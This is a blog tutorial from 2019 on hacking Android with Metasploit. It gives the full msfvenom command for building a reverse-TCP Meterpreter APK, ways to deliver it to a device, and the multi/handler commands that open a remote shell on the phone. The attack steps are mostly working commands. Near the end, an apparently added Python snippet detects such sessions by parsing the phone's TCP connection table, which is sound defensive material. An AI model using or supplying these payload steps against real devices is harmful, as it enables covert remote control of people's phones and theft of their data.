Hacking Android With Metasploit

Good morning/evening/night my fellow hackers, today’s lesson is on Metasploit and how we can hack Android with a Metasploit payload. So let’s get started!!

As always, this post is for educational purposes and should not be used on your friends or enemies, that’s illegal.

Firstly we are using an Android emulator for this class. You can download the APK yourself from here and try this cool hack.

Once you have that set up, we then need an attacking machine with Metasploit built in, Kali Linux is our go-to attacking machine.

Next we will generate our android payload and make it into an APK so that it is executable, so open up a shell and on the command line type

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.139 LPORT=4444 R > androidhack.apk

In the command above we are asking the tool msfvenom to use the payload of reverse TCP, use our attacking IP as the LHOST and 4444 as the LPORT we will use to listen on.

Your IP may differ from ours, you can check with the ifconfig command.

Before we do anything with our new file, we will need to give it permissions to be able to execute, type

chmod 755 androidhack.apk

Once you enter that command the color of the file should turn green.

That’s the payload generated as an APK file that can be installed by any Android device. Next we will need to infect the device.

So let’s install the APK on the Android emulator.

To do that we just need to visit our attacking machine IP, so open a browser on the device and go to 192.168.1.139.

Let’s click on the file and install it on the device, once the app is installed you will be informed, but don’t open it just yet.

Now we need to generate an exploit on our attacking machine, we will do this with Metasploit. So open up a new tab or shell and type msfconsole.

Once the Metasploit console is open we can now generate the exploit. On the command line type

use exploit/multi/handler

Next we need to set the payload for a reverse TCP connection with the app on the Android device. Type

set PAYLOAD android/meterpreter/reverse_tcp

Perfect, now we set our attacking machine’s IP as the LHOST again, so type

set LHOST 192.168.1.139

A show options command will tell us that everything is set up correctly.

All that’s left to do now is exploit! Type

exploit

Now let’s open the APK file on the Android device, when we click on the Open button we should get a reverse TCP shell from the Android device to our meterpreter shell.

Beauty, it worked!! Just to confirm we can type the command sysinfo.

And as we can see we have managed to hack the device.
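From the defender's side, the session opened above is an ordinary outbound TCP connection from the device to LHOST:LPORT, so it shows up in the device's connection table. The following is an added example, not part of the original post: it parses /proc/net/tcp text and flags established connections to a watched port or host. The sample table, the function names and the UID are constructed for illustration; 4444 is only the LPORT used in this walkthrough, so treat a hit as a lead rather than proof.

```python
import socket
import struct

# Constructed sample in /proc/net/tcp format (not a real capture).
# Row 1 is the device (10.0.2.15) connected to 192.168.1.139:4444.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:15B3 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1234 1 0000000000000000 100 0 0 10 0
   1: 0F02000A:B1C4 8B01A8C0:115C 01 00000000:00000000 00:00000000 00000000 10089        0 5678 1 0000000000000000 20 4 30 10 -1
   2: 0F02000A:A3F2 2E7DFA8E:01BB 01 00000000:00000000 00:00000000 00000000 10061        0 9012 1 0000000000000000 20 4 30 10 -1
"""

TCP_ESTABLISHED = "01"  # kernel state code for an established connection


def decode_endpoint(field):
    """Turn 'HEXADDR:HEXPORT' into (dotted IPv4, port).

    The kernel prints the IPv4 address as a little-endian 32-bit hex value,
    so 127.0.0.1 appears as 0100007F.
    """
    addr_hex, port_hex = field.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(addr_hex, 16)))
    return ip, int(port_hex, 16)


def find_reverse_sessions(proc_net_tcp, watch_ports=(4444,), watch_hosts=()):
    """Return established connections whose remote end matches a watched port or host."""
    hits = []
    for line in proc_net_tcp.splitlines()[1:]:  # skip the header row
        cols = line.split()
        if len(cols) < 8 or cols[3] != TCP_ESTABLISHED:
            continue
        rip, rport = decode_endpoint(cols[2])
        if rport in watch_ports or rip in watch_hosts:
            lip, lport = decode_endpoint(cols[1])
            # cols[7] is the UID that owns the socket; on Android each app has its own UID
            hits.append({"uid": int(cols[7]),
                         "local": f"{lip}:{lport}",
                         "remote": f"{rip}:{rport}"})
    return hits


if __name__ == "__main__":
    for hit in find_reverse_sessions(SAMPLE_PROC_NET_TCP):
        print(hit)
```

The owning UID in each hit can then be matched against the installed packages to find which app opened the connection.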

Thanks so much for reading to the end, please feel free to like, share or comment.

And don’t forget to subscribe to get more free tutorials like this one.

QuBits 2019-09-04

 
